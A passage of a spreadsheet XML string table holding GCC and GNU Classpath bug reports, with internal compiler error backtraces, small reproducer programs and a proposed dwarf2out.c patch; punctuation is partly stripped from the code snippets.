difference comes from elsewhere.  I haven't investigated further.</t>
  </si>
  <si>
    <t>GCC-83765</t>
  </si>
  <si>
    <t>LTO bootstrap with Ada fails</t>
  </si>
  <si>
    <t>At the moment it ICEs for me with
&gt; /abuild/rguenther/obj/./prev-gcc/lto1 -quiet -dumpdir ./ -dumpbase gnat1.ltrans0 -mtune=generic -march=x86-64 -mtune=generic -march=x86-64 -auxbase-strip gnat1.ltrans0.ltrans.o -g -g -O2 -O2 -O2 -Wextra -Wpedantic -version -fno-openmp -fno-openacc -frandom-seed=1 -fno-exceptions -fasynchronous-unwind-tables -fno-common -frandom-seed=1 -fltrans gnat1.ltrans0.o -o gnat1.ltrans0.s
GNU GIMPLE (GCC) version 8.0.0 20180109 (experimental) (x86_64-pc-linux-gnu)
        compiled by GNU C version 4.8.5 GMP version 5.1.3 MPFR version 3.1.2 MPC version 1.0.2 isl version isl-0.18-GMP
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU GIMPLE (GCC) version 8.0.0 20180109 (experimental) (x86_64-pc-linux-gnu)
        compiled by GNU C version 4.8.5 GMP version 5.1.3 MPFR version 3.1.2 MPC version 1.0.2 isl version isl-0.18-GMP
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
/space/rguenther/src/svn/trunk/gcc/ada/exp_ch4.adb: In function â€˜exp_ch4__expand_n_reduction_expressionâ€™:
/space/rguenther/src/svn/trunk/gcc/ada/exp_ch4.adb:10117: warning: â€˜actualâ€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
       Reduction_Par := Expression (Actual)
/space/rguenther/src/svn/trunk/gcc/ada/exp_ch4.adb:10092: note: â€˜actualâ€™ was declared here
       Actual        : Node_Id
/space/rguenther/src/svn/trunk/gcc/ada/exp_ch3.adb: In function â€˜exp_ch3__expand_n_full_type_declarationâ€™:
/space/rguenther/src/svn/trunk/gcc/ada/atree.adb:5952:38: warning: â€˜m_idâ€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
          Nodes.Table (N + 2).Field10 := Union_Id (Val)
                                      ^
/space/rguenther/src/svn/trunk/gcc/ada/exp_ch3.adb:5483: note: â€˜m_idâ€™ was declared here
             M_Id  : Entity_Id
during RTL pass: final
/space/rguenther/src/svn/trunk/gcc/ada/exp_spark.adb: In function â€˜exp_spark__expand_spark_potential_renamingâ€™:
/space/rguenther/src/svn/trunk/gcc/ada/exp_spark.adb:498: internal compiler error: in add_dwarf_attr at dwarf2out.c:4168
    end Expand_SPARK_Potential_Renaming
0x981cc7 add_dwarf_attr
        /space/rguenther/src/svn/trunk/gcc/dwarf2out.c:4168
0x981dbc add_AT_flag
        /space/rguenther/src/svn/trunk/gcc/dwarf2out.c:4207
0x9b0cb9 gen_subprogram_die
        /space/rguenther/src/svn/trunk/gcc/dwarf2out.c:22243
0x9ba815 gen_decl_die
        /space/rguenther/src/svn/trunk/gcc/dwarf2out.c:25490
0x9b9175 process_scope_var
where the issue is IMHO that in get_subprogram_die we have
(gdb) p decl
$7 = 
$8 = 
(gdb) p decl-&gt;decl_common.abstract_origin 
$9 = 
(gdb) p decl-&gt;decl_common.abstract_flag 
$10 = 0
and thus we get origin == decl and also old_die.  declaration == 1 but
due to the above we run into the if instead of the else if branch:
  /* A concrete instance tag a new DIE with DW_AT_abstract_origin.  */
  if (origin != NULL)
    {   
...
    }
  /* A cached copy possibly from early dwarf generation.  Reuse as
     much as possible.  */
  else if (old_die)
    {
      /* A declaration that has been previously dumped needs no
         additional information.  */
      if (declaration)
        return
and end up adding DW_AT_declaration a second time (we come here multiple
times because it looks like a function with this declaration in its
scopes was inlined multiple times into exp_ch2__expand_entity_reference).
Now the interesting part is who sets this origin to self quite likely
set_decl_origin_self (tried to get rid of that with no success...).
And it is set this way already in the LTO bytecode for the LTRANS stage.
Of course when coming along this in a declaration context via processing
BLOCK_NONLOCALIZED_VARS this confuses the machinery :/  Note how
set_block_origin_self does _not_ recurse into BLOCK_NONLOCALIZED_VARS!
Note we properly pass down NULL as origin but the passing down stops
at gen_decl_die -&gt; gen_subprogram_die who recomputes it.
So
Index: gcc/dwarf2out.c
===================================================================
--- gcc/dwarf2out.c     (revision 256378)
+++ gcc/dwarf2out.c     (working copy)
@@ -219549 +219548 @@ gen_call_site_die (tree decl dw_die_ref
    block-local).  */
 static void
-gen_subprogram_die (tree decl dw_die_ref context_die)
+gen_subprogram_die (tree decl tree origin dw_die_ref context_die)
 {
-  tree origin = decl_ultimate_origin (decl)
   dw_die_ref subr_die
   dw_die_ref old_die = lookup_decl_die (decl)
@@ -251997 +251987 @@ force_decl_die (tree decl)
             declaration die.  */
          save_fn = current_function_decl
          current_function_decl = NULL_TREE
-         gen_subprogram_die (decl context_die)
+         gen_subprogram_die (decl decl_ultimate_origin (decl) context_die)
          current_function_decl = save_fn
          break
@@ -254877 +254867 @@ gen_decl_die (tree decl tree origin st
       /* Now output a DIE to represent the function itself.  */
       if (decl)
-        gen_subprogram_die (decl context_die)
+        gen_subprogram_die (decl origin context_die)
       break
     case TYPE_DECL:
looks appealling... (testing that now)</t>
  </si>
  <si>
    <t>GCC-82398</t>
  </si>
  <si>
    <t>[8 Regression] error: qsort comparator non-negative on sorted output: 2 in fill_vec_av_set at gcc/sel-sched.c:3725</t>
  </si>
  <si>
    <t>Using cross-compiler one can see after Alexander's commit r253295:
$ ppc64-linux-gnu-gcc /home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/torture/pr56195.c  -Ofast -fselective-scheduling
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/torture/pr56195.c: In function â€˜fnâ€™:
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/torture/pr56195.c:31:1: error: qsort comparator non-negative on sorted output: 2
 }
 ^
during RTL pass: sched1
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/torture/pr56195.c:31:1: internal compiler error: qsort checking failed
0x57afe6 qsort_chk_error
	.././../gcc/vec.c:222
0x128f3b5 qsort_chk(void* unsigned long unsigned long int (*)(void const* void const*))
	.././../gcc/vec.c:274
0xb11ca3 vec::qsort(int (*)(void const* void const*))
	.././../gcc/vec.h:973
0xb11ca3 vec::qsort(int (*)(void const* void const*))
	.././../gcc/vec.h:1735
0xb11ca3 fill_vec_av_set
	.././../gcc/sel-sched.c:3725
0xb14493 fill_ready_list
	.././../gcc/sel-sched.c:4022
0xb14493 find_best_expr
	.././../gcc/sel-sched.c:4382
0xb14493 fill_insns
	.././../gcc/sel-sched.c:5539
0xb165b0 schedule_on_fences
	.././../gcc/sel-sched.c:7356
0xb165b0 sel_sched_region_2
	.././../gcc/sel-sched.c:7494
0xb18ae1 sel_sched_region_1
	.././../gcc/sel-sched.c:7536
0xb18ae1 sel_sched_region(int)
	.././../gcc/sel-sched.c:7637
0xb190c9 run_selective_scheduling()
	.././../gcc/sel-sched.c:7713
0xaf182d rest_of_handle_sched
	.././../gcc/sched-rgn.c:3715
0xaf182d execute
	.././../gcc/sched-rgn.c:3825</t>
  </si>
  <si>
    <t>GCC-70808</t>
  </si>
  <si>
    <t>Spurious -Wzero-as-null-pointer-constant for nullptr_t</t>
  </si>
  <si>
    <t>The following program emits a warning when compiled with -Wzero-as-null-pointer-constant:
int main()
{
    int* no_warn = {}
    // main.cpp:5:33: warning: zero as null pointer constant [-Wzero-as-null-pointer-constant]
    decltype( nullptr ) warn = {}
}
Unless I'm mistaken this is not intended as demonstrated by the innocuous no_warn variable.
Happens on a variety of versions e.g. 5.3.1 and 6 as well as multiple -std settings e.g. c++11 and c++1z.</t>
  </si>
  <si>
    <t>GCC-35618</t>
  </si>
  <si>
    <t>[4.3 regression] ICE in cgraph_estimate_size_after_inlining at ipa-inline.c:188</t>
  </si>
  <si>
    <t>$ gcc -Wp-MDkernel/.sched.o.d  -nostdinc -isystem /usr/lib/gcc/i486-linux-gnu/4.3.1/include -D__KERNEL__ -Iinclude -Iinclude2 -I/home/bunk/linux/kernel-2.6/git/linux-2.6/include -include include/linux/autoconf.h -I/home/bunk/linux/kernel-2.6/git/linux-2.6/kernel -Ikernel -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Os -fno-stack-protector -D__arch_um__ -DSUBARCH=\i386\ -I/home/bunk/linux/kernel-2.6/git/linux-2.6/arch/um/include -Iarch/um/include  -I/home/bunk/linux/kernel-2.6/git/linux-2.6/arch/um/include  -I/home/bunk/linux/kernel-2.6/git/linux-2.6/arch/um/include/skas -Dvmap=kernel_vmap -Din6addr_loopback=kernel_in6addr_loopback -Din6addr_any=kernel_in6addr_any -march=i686 -mpreferred-stack-boundary=2 -ffreestanding -D_LARGEFILE64_SOURCE -Derrno=kernel_errno -Dsigprocmask=kernel_sigprocmask -Dmktime=kernel_mktime -fno-unit-at-a-time -fno-omit-frame-pointer -fno-optimize-sibling-calls -g -Wdeclaration-after-statement -Wno-pointer-sign -fno-omit-frame-pointer  -DKBUILD_STR(s)=#s -DKBUILD_BASENAME=KBUILD_STR(sched)  -DKBUILD_MODNAME=KBUILD_STR(sched) -c -o kernel/sched.o /home/bunk/linux/kernel-2.6/git/linux-2.6/kernel/sched.c
In file included from /home/bunk/linux/kernel-2.6/git/linux-2.6/kernel/sched.c:1213:
/home/bunk/linux/kernel-2.6/git/linux-2.6/kernel/sched_idletask.c: In function â€˜check_preempt_curr_idleâ€™:
/home/bunk/linux/kernel-2.6/git/linux-2.6/kernel/sched_idletask.c:20: internal compiler error: in cgraph_estimate_size_after_inlining at ipa-inline.c:188
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gcc --version
gcc (Debian 4.3.0-1) 4.3.1 20080309 (prerelease)</t>
  </si>
  <si>
    <t>GCC-58294</t>
  </si>
  <si>
    <t>[4.9 Regression] ice in update_ssa_across_abnormal_edges at tree-inline.c:1892</t>
  </si>
  <si>
    <t>Created attachment 30739
gzipped C++ source code
I just tried to compile package 0ad-0.0.13-8.fc20 with gcc 4.9 trunk
dated 20130901. It said
/usr/include/boost/smart_ptr/detail/sp_counted_base_gcc_x86.hpp: In function 'Status png_decode(rpU8 size_t Tex*)':
/usr/include/boost/smart_ptr/detail/sp_counted_base_gcc_x86.hpp:160:22: internal compiler error: in update_ssa_across_abnormal_edges at tre
e-inline.c:1892
             destroy()
                      ^
0xb61e7f update_ssa_across_abnormal_edges
    ../../src/trunk/gcc/tree-inline.c:1892
0xb61e7f copy_edges_for_bb
    ../../src/trunk/gcc/tree-inline.c:2002
0xb61e7f copy_cfg_body
    ../../src/trunk/gcc/tree-inline.c:2386
0xb61e7f copy_body
    ../../src/trunk/gcc/tree-inline.c:2595
0xb66acb expand_call_inline
    ../../src/trunk/gcc/tree-inline.c:4197
0xb66acb gimple_expand_calls_inline
    ../../src/trunk/gcc/tree-inline.c:4304
0xb66acb optimize_inline_calls(tree_node*)
    ../../src/trunk/gcc/tree-inline.c:4458
0xf83b2d inline_transform(cgraph_node*)
    ../../src/trunk/gcc/ipa-inline-transform.c:436
0xa55839 execute_one_ipa_transform_pass
    ../../src/trunk/gcc/passes.c:2039
0xa55839 execute_all_ipa_transforms()
    ../../src/trunk/gcc/passes.c:2079
0x7f0030 expand_function
    ../../src/trunk/gcc/cgraphunit.c:1683
0x7f200e expand_all_functions
    ../../src/trunk/gcc/cgraphunit.c:1795
0x7f200e compile()
    ../../src/trunk/gcc/cgraphunit.c:2132
0x7f25f9 finalize_compilation_unit()
    ../../src/trunk/gcc/cgraphunit.c:2209
0x5fe53d cp_write_global_declarations()
    ../../src/trunk/gcc/cp/decl2.c:4364
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-39519</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] bad assignment to type with allocatable component</t>
  </si>
  <si>
    <t>GNU Fortran (GCC) 4.4.0 20090219 (experimental) [trunk revision 144289]
The code below generates the output:
T2%A = 42
This is wrong the output should be:
T2%A = 23
PROGRAM X
TYPE T
INTEGER POINTER :: P
INTEGER ALLOCATABLE :: A(:)
END TYPE T
TYPE(T) :: T1T2
ALLOCATE ( T1%A(1) )
ALLOCATE ( T2%A(1) )
T1%A = 23
T2 = T1
T1%A = 42
PRINT * 'T2%A = 'T2%A
END PROGRAM X</t>
  </si>
  <si>
    <t>gilbert.scott</t>
  </si>
  <si>
    <t>CLASSPATH-22818</t>
  </si>
  <si>
    <t>JLabel.setDisplayedMnemonic crashes if given char is not found</t>
  </si>
  <si>
    <t xml:space="preserve">
Caused by: java.lang.StringIndexOutOfBoundsException: String index out of range: -1
   at java.lang.String.charAt (String.java:476)
   at javax.swing.JLabel.setDisplayedMnemonicIndex (JLabel.java:418)
   at javax.swing.JLabel.setDisplayedMnemonic (JLabel.java:375)
   at javax.swing.JLabel.setDisplayedMnemonic (JLabel.java:388)
Sun's javax does nothing on that case - also in Suns
JavaDoc there is no exception specified.</t>
  </si>
  <si>
    <t>GCC-81088</t>
  </si>
  <si>
    <t>UBSAN: false positive as a result of reassosiation</t>
  </si>
  <si>
    <t>gcc rev249171.
&gt; cat f.cpp
short s = 2
short y = 1
int i
int main() {
  i = -(s + int(~unsigned(0 / y))) + 0x7fffffff
  return 0
}
&gt; g++ -fsanitize=undefined -O0 f.cpp -o out
&gt; ./out
f.cpp:5:36: runtime error: signed integer overflow: -2 + -2147483648 cannot be represented in type 'int'</t>
  </si>
  <si>
    <t>GCC-4773</t>
  </si>
  <si>
    <t>Internal Compiler Error when 'template  friend handle' added to handle class</t>
  </si>
  <si>
    <t>I tried to create a template class that was a friend to
every type of that template class. I was not sure if
this was possible or not but I figured that if it was
the line would look something like this:
template  friend handle
I added this line to the class and recompiled. I got an ICE. I was on a Win2K box runinng Cygwin at the time.
I then attempted the build on my RedHat 7.1 linux box and I recieved yet another ICE.
The command line was as follows:
g++ -v -save-temps -DHAVE_CONFIG_H -I. -I. -I.. -g -O2 -c -o main.o main.cpp
The output is as follows:
Reading specs from /usr/lib/gcc-lib/i686-pc-cygwin/2.95.3-5/specs
gcc version 2.95.3-5 (cygwin special)
GNU CPP version 2.95.3-5 (cygwin special) (80386 BSD syntax)
#include ... search starts here:
#include  search starts here:
 .
 ..
 /usr/local/include
 /usr/include/g++-3
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.3-5/include
 /usr/include
 /usr/include/w32api
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.3-5/cc1plus.exe main.ii -quiet -dumpbase main.cc -g -O2 -version -o main.s
GNU C++ version 2.95.3-5 (cygwin special) (i686-pc-cygwin) compiled by GNU C version 2.95.3-5 (cygwin special).
In file included from main.cpp:15:
handle.h: In instantiation of `handle':
world.h:28:   instantiated from here
handle.h:12: Internal compiler error.
handle.h:12: Please submit a full bug report.
handle.h:12: See  for instructions.
Release:
gcc version 2.95.3-5 (cygwin special)
Environment:
I have been able to reproduce this bug with both the version of GCC that is included with the latest version of Cygwin and RedHat Linux 7.1.
How-To-Repeat:
Using the attached file main.ii just run:
gcc main.ii
It should ICE.</t>
  </si>
  <si>
    <t>rquattle</t>
  </si>
  <si>
    <t>GCC-1514</t>
  </si>
  <si>
    <t>template operator&lt;&lt; call within constructor</t>
  </si>
  <si>
    <t>The following c++ source code generates an internal
compiler error.
class Foo {
public:
  Foo() {
    *this &lt;&lt; foo
  }
  template
  Foo&amp; operator&lt;&lt;(const T&amp; t) {
    return *this
  }
}
int main() {
  Foo foo
}
gilbert% g++ -v -save-temps x.cc
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem(unix) -Asystem(svr4) -D__EXCEPTIONS -D__GCC_NEW_VARARGS__ -Acpu(sparc) -Amachine(sparc) x.cc x.ii
GNU CPP version 2.95.2 19991024 (release) (sparc)
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/../../../../include/g++-3
 /usr/local/include
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/../../../../sparc-sun-solaris2.7/include
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/cc1plus x.ii -quiet -dumpbase x.cc -version -o x.s
GNU C++ version 2.95.2 19991024 (release) (sparc-sun-solaris2.7) compiled by GNU C version 2.95.2 19991024 (release).
x.cc: In method `class Foo &amp; Foo::operator (const char (&amp;)[4])':
x.cc:4:   instantiated from here
x.cc:8: Internal compiler error.
x.cc:8: Please submit a full bug report.
x.cc:8: See  for instructions.
gilbert% cat x.ii
# 1 x.cc
class Foo {
public:
  Foo() {
    *this &lt;&lt; foo
  }
  template
  Foo&amp; operator&lt;&lt;(const T&amp; t) {
    return *this
  }
}
int main() {
  Foo foo
}
Release:
gcc version 2.95.2 19991024 (release)
Environment:
gilbert% uname -a
SunOS gilbert 5.7 Generic_106541-08 sun4u sparc SUNWUltra-5_10
gilbert% g++ -v 
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/specs
gcc version 2.95.2 19991024 (release)
NOTE: This g++ was a binary release obtained from the
SunFreeWare.com site
How-To-Repeat:
Attempting to compile the source code with
  g++ x.cc
Results in Internal compiler error as detailed above.</t>
  </si>
  <si>
    <t>neil.pearce</t>
  </si>
  <si>
    <t>GCC-19499</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] Bad diagnostic for namespace as template parameter</t>
  </si>
  <si>
    <t>The diagnostic for the following invalid code snippet could be improved:
=================================
template struct A {}
namespace N {}
A a
=================================
On mainline we now get:
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: expected constructor destructor or type conversion before
'&lt;' token
With 3.3.5 we get:
bug5.cc:5: error: use of namespace `N' as expression
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: ISO C++ forbids declaration of `a' with no type
which is okay IMHO. With 3.4.3 we get
bug5.cc:5: error: template argument 1 is invalid
bug5.cc:5: error: invalid type in declaration before '' token
which is less informative but still okay.
With the current 3.4 branch we almost get the same mess as with mainline.</t>
  </si>
  <si>
    <t>GCC-847</t>
  </si>
  <si>
    <t>templated operators in  conflict with rel_ops</t>
  </si>
  <si>
    <t>stl_iterator.h defines templated operator!=() for iterator 
classes.
This prevents the use of std::rel_ops in any scope that 
includes .
Also
There are logical errors in the operators. See operator&lt;=() 
and operator&gt;=()
Release:
stdlibc++-2.90.8
Environment:
i686-pc-linux-gnu (RH6.2 w/ gcc-2.95.2)
How-To-Repeat:
create a container class that defines its own iterators 
not based on std::iterator.
Also use a normal STL class with it.
If you define operator==() for the custom iterator then 
rel_ops is necessary to provide operator!=(). However if
rel_ops is visible then there is ambiguity between the 
templated operator!=() from iterator and from rel_ops.</t>
  </si>
  <si>
    <t>CLASSPATH-30031</t>
  </si>
  <si>
    <t>Wrong return type for XPathExpression</t>
  </si>
  <si>
    <t>When calling XPathExpression::evaluate with the NODESET return type classpath currently returns an ArrayList. However intuitively and backed by Sun Java's return behaviour I would say that this better be a NodeList.</t>
  </si>
  <si>
    <t>CLASSPATH-27429</t>
  </si>
  <si>
    <t>javax.swing.text.html.fireChangedUpdate() not implemented</t>
  </si>
  <si>
    <t>When starting openjump using the CVS version of GNU Classpath I see
this message on stdout:
  fireChangedUpdate not implemented
A quick look in the source tree indicates that
javax/swing/text/html/HTMLDocument.java is the source of this
messages.
I'm not quite sure what the effect is on openjump but as it isn't
working quite right so I thought it best to report the problem.</t>
  </si>
  <si>
    <t>GCC-33471</t>
  </si>
  <si>
    <t>[4.3 regression] internal compiler error: in extract_insn at recog.c:1990</t>
  </si>
  <si>
    <t>Granted the compiler flags I've used for testing are asking for trouble...
$ gcc -march=pentium4 -mfpmath=sse387 -o mplayer.o mplayer.i
mplayer.c: In function 'main':
mplayer.c:3750: error: unrecognizable insn:
(insn 5170 5169 5171 674 mplayer.c:3552 (set (reg:SF 258 [ D.19380 ])
        (float:SF (reg:DI 259 [ step_sec.1242 ]))) -1 (nil))
mplayer.c:3750: internal compiler error: in extract_insn at recog.c:1990
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-14438</t>
  </si>
  <si>
    <t>Potential need for buffer overflow checks in _cpp_lex_direct</t>
  </si>
  <si>
    <t>A i686-pc-linux-gnu compiler built from 
  gcc-3.4-20040303.tar.bz2
exhibits this:
echo #pragma GCC poison foo &gt; _dummy.c
gcc -E -nostdinc _dummy.c
  # 1 _dummy.c
  # 1 
  # 1 
  # 1 _dummy.c       
  # 4294967218 _dummy.c
Umm ah line number 4294967218 ? This bug was brought to my attention by GAS
when it said:
   line numbers must be positive line number -15 rejected
The bug is in GCC-3.3.2 but isn't in 3.3.1.</t>
  </si>
  <si>
    <t>lindsayd</t>
  </si>
  <si>
    <t>GCC-2888</t>
  </si>
  <si>
    <t>crash in reload on eliminating register in REG_EQUAL note containing ASM_OUTPUT</t>
  </si>
  <si>
    <t>the attached testcase is x86_64 testcase converted to i386 so it produces incorrect assembly but should compile fluently.
Regression over 2.95 not tested on the branch.
Release:
3.1
Environment:
i386 mailne CVS
How-To-Repeat:
gcc -O2 qq.i -S</t>
  </si>
  <si>
    <t>GCC-31193</t>
  </si>
  <si>
    <t>[4.2 only] ICE on non-constant character tranfert</t>
  </si>
  <si>
    <t>There are known problems with attempts at folding TRANSFER in constant expressions.  However the following code doesn't involve this and should work properly even if folding of TRANSFER simply bails out without attempting to fold anything.  Instead it gives an ICE (in the middle-end not in the Fortran front-end).
debian-gfortran:~/test&gt; more awgrey2.f90
function NumOccurances(stringchr) result(n)
  character(*)intent(in) :: string
  character(1)intent(in) :: chr
!
! return number of occurances of character in given string
!
    n=count(transfer(stringchar(1)len(string))==chr)
  return
end
debian-gfortran:~/test&gt; ~/bin-trunk/bin/gfortran awgrey2.f90
awgrey2.f90: In function 'numoccurances':
awgrey2.f90:1: internal compiler error: in fold_binary at fold-const.c:8999
Please submit a full bug report
debian-gfortran:~/test&gt; ~/bin-trunk/bin/gfortran --version
GNU Fortran (GCC) 4.3.0 20070307 (experimental)</t>
  </si>
  <si>
    <t>GCC-31771</t>
  </si>
  <si>
    <t>[4.3 Regression] g++.dg/gomp/pr26913.C ICEs</t>
  </si>
  <si>
    <t>/home/richard/src/trunk2/gcc/testsuite/g++.dg/gomp/pr26913.C: In function 'void _Z3bazv.omp_fn.0(void*)':^M
/home/richard/src/trunk2/gcc/testsuite/g++.dg/gomp/pr26913.C:14: error: unnecessary EH edge 5-&gt;6^M
/home/richard/src/trunk2/gcc/testsuite/g++.dg/gomp/pr26913.C:14: internal compiler error: verify_flow_info failed^M
Please submit a full bug report^M
with preprocessed source if appropriate.^M
See  for instructions.^M
FAIL: g++.dg/gomp/pr26913.C (internal compiler error)
FAIL: g++.dg/gomp/pr26913.C (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-2394</t>
  </si>
  <si>
    <t>-O2 -mcpu=ultrasparc can generate std's to non-8-byte aligned stack offsets</t>
  </si>
  <si>
    <t>Compilation of the attached file generates the following code:
...
.stabn 68086.LLM74-gccbug
.LLM74:
.LLBE7:
	mov	%l1 %o1
	mov	%l0 %o0
	std	%f2 [%sp+92]
	mov	%l2 %o2
	mov	%l3 %o3
	st	%i1 [%sp+100]
	mov	%l4 %o4
	call	gccbug_1 0
	mov	0 %o5
...
Note the std %f2 [%sp+92]. 92 (0x5c) is not a multiple of 8
the std will thus cause a SIGBUS.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
$ uname -svrmip
SunOS 5.8 Generic_108528-04 sun4u sparc SUNWUltra-80
How-To-Repeat:
Compile the attached file with
$ gcc -g -mcpu=ultrasparc -O2 -S gccbug.c -o gccbug.s
Search for the code following the stab for line 86.</t>
  </si>
  <si>
    <t>grubba</t>
  </si>
  <si>
    <t>GCC-80173</t>
  </si>
  <si>
    <t>[6 Regression] ICE in store_bit_field_1 at expmed.c:787</t>
  </si>
  <si>
    <t>&gt; cat ../struct_asm.c 
/* { dg-do compile } */
typedef int v8 __attribute__ ((vector_size(8)))
struct U {
  v8 a
  v8 b
}
int
foo (int i)
{
  register struct U u asm (xmm0) = {{-1 0} {-1 0}}
  return u.b[i]
}
&gt; gcc ../struct_asm.c                                                                                                                                      
../struct_asm.c: In function â€˜fooâ€™:
../struct_asm.c:13:21: internal compiler error: in store_bit_field_1 at expmed.c:787
   register struct U u asm (xmm0) = {{-1 0} {-1 0}}</t>
  </si>
  <si>
    <t>GCC-16129</t>
  </si>
  <si>
    <t>[3.4.1 regression] g++.old-deja/g++.eh/catch[35679]*.C</t>
  </si>
  <si>
    <t>New failures on the 3.4 branch:
FAIL: g++.old-deja/g++.eh/catch3.C execution test
FAIL: g++.old-deja/g++.eh/catch3p.C execution test
FAIL: g++.old-deja/g++.eh/catch5.C execution test
FAIL: g++.old-deja/g++.eh/catch5p.C execution test
FAIL: g++.old-deja/g++.eh/catch6.C execution test
FAIL: g++.old-deja/g++.eh/catch6p.C execution test
FAIL: g++.old-deja/g++.eh/catch7.C execution test
FAIL: g++.old-deja/g++.eh/catch7p.C execution test
FAIL: g++.old-deja/g++.eh/catch9.C execution test
FAIL: g++.old-deja/g++.eh/catch9p.C execution test
These occur in 32-bit mode only.</t>
  </si>
  <si>
    <t>GCC-42915</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: same canonical type node for different types in recent builds</t>
  </si>
  <si>
    <t>Command line:
gcc -c testcase.cpp
Tested revisions:
r156392 - crash
r156367 - crash
r156293 - OK
r156260 - OK
r154975 - OK (4.4)
Output:
$ /mnt/svn/gcc-trunk/binary-156367-lto/bin/gcc testcase.cpp -c
testcase.cpp:9:28: internal compiler error: same canonical type node for different types A::B and A::B
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-29835</t>
  </si>
  <si>
    <t>Error message of unknown edit descriptor needs improvement</t>
  </si>
  <si>
    <t>gfortran writes:
    read(1'(QA)'iostat=i) nline(:n)
                                      1
Warning: Unexpected element in format string at (1)
And if there is a long comment it may even look like:
XLINE
    1
Warning: Unexpected element in format string at (1)
Expected:
    read(1'(QA)'iostat=i) nline(:n)
             1
Warning: Unexpected element in format string at (1)
or even:
Warning: Unexpected element 'Q' in format string at (1)
(The run-time message is also slightly misaligned:
read(1'(QA)') nline(:n)
       1
---------- Test program ---------
integer parameter :: MAXLINE = 255
character(MAXLINE) line
open(1file='whatever' access='sequential'form='formatted'action='read')
do
   read(1'(QA)'iostat=i) nline(:n)
   if (i/=0) exit
! real work here
 enddo
end
---------- Test program ---------
Cf. http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/d968667b1e3219ab
 * * *
The Q edit descriptor is e.g. described at
http://www.helsinki.fi/atk/unix/dec_manuals/cf77au/olrm0242.htm
It is documented but not supported in g77 seems to be a DEC extension and is supported by ifort and sunf95.
I think gfortran does not need to support it.</t>
  </si>
  <si>
    <t>GCC-14650</t>
  </si>
  <si>
    <t>Testsuite failures with -mabi=64 in compile/20031023-1.c 20031023-2.c and 20031023-3.c</t>
  </si>
  <si>
    <t>As noted in these reports:
http://gcc.gnu.org/ml/gcc-testresults/2004-03/msg00822.html
http://gcc.gnu.org/ml/gcc-testresults/2004-03/msg00959.html
I'm seeing testsuite failures with -mabi=64 on these testcases:
FAIL: gcc.c-torture/compile/20031023-1.c  -O0  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-1.c  -O1  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-1.c  -O2  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-1.c  -O3 -fomit-frame-pointer  (test for 
excess errors)
FAIL: gcc.c-torture/compile/20031023-1.c  -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-1.c  -Os  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-2.c  -O0  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-2.c  -O1  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-2.c  -O2  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-2.c  -O3 -fomit-frame-pointer  (test for 
excess errors)
FAIL: gcc.c-torture/compile/20031023-2.c  -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-2.c  -Os  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-3.c  -O0  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-3.c  -O1  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-3.c  -O2  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-3.c  -O3 -fomit-frame-pointer  (test for 
excess errors)
FAIL: gcc.c-torture/compile/20031023-3.c  -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/compile/20031023-3.c  -Os  (test for excess errors)
In the .log files I see messages like this from the native assembler:
